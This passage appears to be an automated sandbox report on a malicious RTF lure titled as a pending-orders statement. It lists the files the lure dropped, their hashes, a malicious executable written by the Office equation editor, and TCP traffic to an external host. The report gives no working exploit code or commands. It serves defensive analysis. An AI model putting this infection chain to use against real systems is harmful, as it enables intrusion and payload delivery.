                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Temp\Cab232D.tmp
                                                                            Process:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                            Category:dropped
                                                                            Size (bytes):59134
                                                                            Entropy (8bit):7.995450161616763
                                                                            Encrypted:true
                                                                            SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                            MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                            SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                            SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                            SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                            C:\Users\user\AppData\Local\Temp\Tar232E.tmp
                                                                            Process:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):152788
                                                                            Entropy (8bit):6.316654432555028
                                                                            Encrypted:false
                                                                            SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                            MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                            SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                            SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                            SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Pending Orders Statement -40064778.LNK
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Jan 28 02:29:36 2021, length=354788, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2268
                                                                            Entropy (8bit):4.5918339824333545
                                                                            Encrypted:false
                                                                            SSDEEP:24:8rD/XTd6jFyi2ekAsqDDv3qPdM7dD2rD/XTd6jFyi2ekAsqDDv3qPdM7dV:8f/XT0jFt26qPQh2f/XT0jFt26qPQ/
                                                                            MD5:016FB75FF443766A7279CA9045AF5BDD
                                                                            SHA1:FD32D47D894E3105C74A04367F2D5EE8A91A87AC
                                                                            SHA-256:1B919601559C7502D75FC4364275964239103DBFCBA815CAA84974E8ACAF9053
                                                                            SHA-512:941629FE30E9CD0EA5B302BA6C6BF3281E1BF0D7C90638F97BA5378F34DDD57A6B49AE40093D62C6A6F6CD97347E2F55E7AFC0B25F0A1E38FEA3CB69B7E565D4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: L..................F.... ...y.j..{..y.j..{...;..%....i...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..i..<R.. .PENDIN~1.DOC..z.......Q.y.Q.y*...8.....................P.e.n.d.i.n.g. .O.r.d.e.r.s. .S.t.a.t.e.m.e.n.t. .-.4.0.0.6.4.7.7.8...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\724536\Users.user\Desktop\Pending Orders Statement -40064778.doc.=.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.e.n.d.i.n.g. .O.r.d.e.r.s. .S.t.a.t.e.m.e.n.t. .-.4.0.0.6.4.7.7.8...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):140
                                                                            Entropy (8bit):4.736685473680344
                                                                            Encrypted:false
                                                                            SSDEEP:3:M1K++i2RyDhdpStb+i2RyDhdpSmX1K++i2RyDhdpSv:MIdi2RULpECi2RULpAdi2RULpc
                                                                            MD5:821573196FFE2311197C79E1D2FD939E
                                                                            SHA1:39CCA7E16FE3E84413C236FCDE8349E681A4CD4C
                                                                            SHA-256:EC23706907FB744BCA81DA26E10E724D5E06A4B6009F0C431110F8045EC44FB5
                                                                            SHA-512:A0BD9FC15A76FCE0AD4FA6C53661B432F8F90A200F80276A64803FD83E02582B22EC5744210B036F0E9018B24411DCFE6FD5CA02877463E3E5497F44CBBE163C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: [doc]..Pending Orders Statement -40064778.LNK=0..Pending Orders Statement -40064778.LNK=0..[doc]..Pending Orders Statement -40064778.LNK=0..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):162
                                                                            Entropy (8bit):2.431160061181642
                                                                            Encrypted:false
                                                                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                            Malicious:false
                                                                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview: ..
                                                                            C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):246784
                                                                            Entropy (8bit):5.925208163230513
                                                                            Encrypted:false
                                                                            SSDEEP:3072:K/uLx1t8/TCCQKvI3zEl0JHPXzy/4ELgBmDiUvQk85lNphtv:KWt18Q2I3zMCfzt/9
                                                                            MD5:D0154FB70ABD786136AE9F68F285541C
                                                                            SHA1:42988286A1993959373A692AC455375B6AD2AE76
                                                                            SHA-256:E83D03CCD3C91744C4BC4D43A1EA9D55FC7211237F7197C33838507B92D50024
                                                                            SHA-512:8A6660F2A0A1C0A6186FEDD78CE8D5F2BA3FE504E5E0E0113116FAFE99E7604E14EE53D58A0E3B0BB780C59AB5392B6212B5B3610986DBD587BB9EBE52B1B313
                                                                            Malicious:true
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..`................................. ........@.. ....................... ............`.....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H..............................P .......................................................................................................................................................................*.r\..p(N........s.........r`..p.....sO........*.r..p......%.r..p.%.r...p.%.r..p.(<...*.r..p......%.r..p.%.r...p.%.r...p.%.r..p.(<...*.r..p......%.r=f.p.%.r...p.%.r=f.p.%.r.g.p.(<...*~~....:....(0...sg........~....*. ....*2rx..p.()...*2r...p.()...*......(....*~~....:....(
                                                                            C:\Users\user\Desktop\~$nding Orders Statement -40064778.doc
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):162
                                                                            Entropy (8bit):2.431160061181642
                                                                            Encrypted:false
                                                                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                            Malicious:false
                                                                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                                                                            Static File Info

                                                                            General

                                                                            File type:Rich Text Format data, version 1, unknown character set
                                                                            Entropy (8bit):4.005010844024142
                                                                            TrID:
                                                                            • Rich Text Format (5005/1) 55.56%
                                                                            • Rich Text Format (4004/1) 44.44%
                                                                            File name:Pending Orders Statement -40064778.doc
                                                                            File size:354788
                                                                            MD5:47c45cbbc8fa7c9c62efdfcadee09e99
                                                                            SHA1:e44f1f16be00551108ece175186d84ce6432a177
                                                                            SHA256:1bb9591f1ed79d19e77dd9e9b0c05ee37aa36c317e93e1d275df2a801c05afe6
                                                                            SHA512:f85529aa06ed4c492e2ab067df3519bcec86288f9f32112802785169b219bba6c36dc371516f045acbd1c9e2ea0b2099992a67d2978cb962ed14a85a9821734e
                                                                            SSDEEP:6144:iaVgbuklQVZRG1DPV9Uq+qUF9pa3C4T/JnsKxW7Cn11Y6xbZ3Icf12CLPvqSuoo:zSbT6ZyrVyq+X7l49nC7+Brc6XEH
                                                                            File Content Preview:{\rtf1854{\object14683912 14683912\objhtml\objw9136\objh7915{\*\objdata675050 {\mchr4061916.4061916\.4061916 \mchr4061916.4061916\.4061916} \..................... .fbe51715020000000b000

                                                                            File Icon

                                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                                            Static RTF Info

                                                                            Objects

                                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                            000000053h2embeddedeqUATION.3177225no

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 27, 2021 19:29:35.986691952 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.072520018 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.072607040 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.072925091 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.160597086 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354144096 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354203939 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354243994 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354281902 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354320049 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354357004 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354404926 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354439974 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.354448080 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354474068 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.354480028 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.354484081 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.354485989 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354502916 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.354525089 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354547024 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.354590893 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.363082886 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.440202951 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.440604925 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.447611094 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.447655916 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.447866917 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.447912931 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.452287912 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.452330112 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.452481985 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.452526093 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.456533909 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.456576109 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.456648111 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.456675053 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.461241007 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.461283922 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.461391926 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.461437941 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.465612888 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.465711117 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.465711117 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.465765953 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.470371962 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.470412016 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.470509052 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.470555067 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.474622965 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.474699974 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.474782944 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.474827051 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.479243994 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.479285955 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.479336023 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.479367018 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.483680010 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.483758926 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.483855963 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.483903885 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.488166094 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.488248110 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.526103973 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.526386976 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.528136969 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.528300047 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.533133984 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.533291101 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.535181999 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.535224915 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.535330057 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.535372972 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.539221048 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.539259911 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.539367914 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.539412022 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.542968988 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.543013096 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.543064117 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.543107986 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.546428919 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.546467066 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.546513081 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.546555042 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.549827099 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.549868107 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.549935102 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.549977064 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.552992105 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.553034067 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.553076029 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.553117990 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.555919886 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.555964947 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.556045055 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.556087971 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.558938026 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.559011936 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.559020042 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.559058905 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.561638117 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.561680079 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.561708927 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.561734915 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.564626932 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.564667940 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.564757109 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.564800024 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.567045927 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.567085028 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.567186117 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.567205906 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.569545984 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.569586992 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.569641113 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.571043015 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.572016954 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.572057009 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.572104931 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.572129011 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.574443102 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.574481964 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.574508905 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.574534893 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.577076912 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.577117920 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.577199936 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.577244997 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.579154968 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.579193115 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.579237938 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.579263926 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.581456900 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.581505060 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.581533909 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.581543922 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.581572056 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.581587076 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.583790064 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.583830118 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.583928108 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.583971977 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.611849070 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.611886978 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.612109900 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.612174034 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.613641977 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.613682985 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.613728046 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.613754034 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.619950056 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.619998932 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.620131969 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.620712996 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.620753050 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.620794058 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.620807886 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.623863935 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.623903990 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.623965025 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.623991013 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.624572992 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.624605894 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.624650002 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.624669075 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.627692938 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.627753019 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.627815962 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.627841949 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.628377914 CET8049167172.111.202.41192.168.2.22
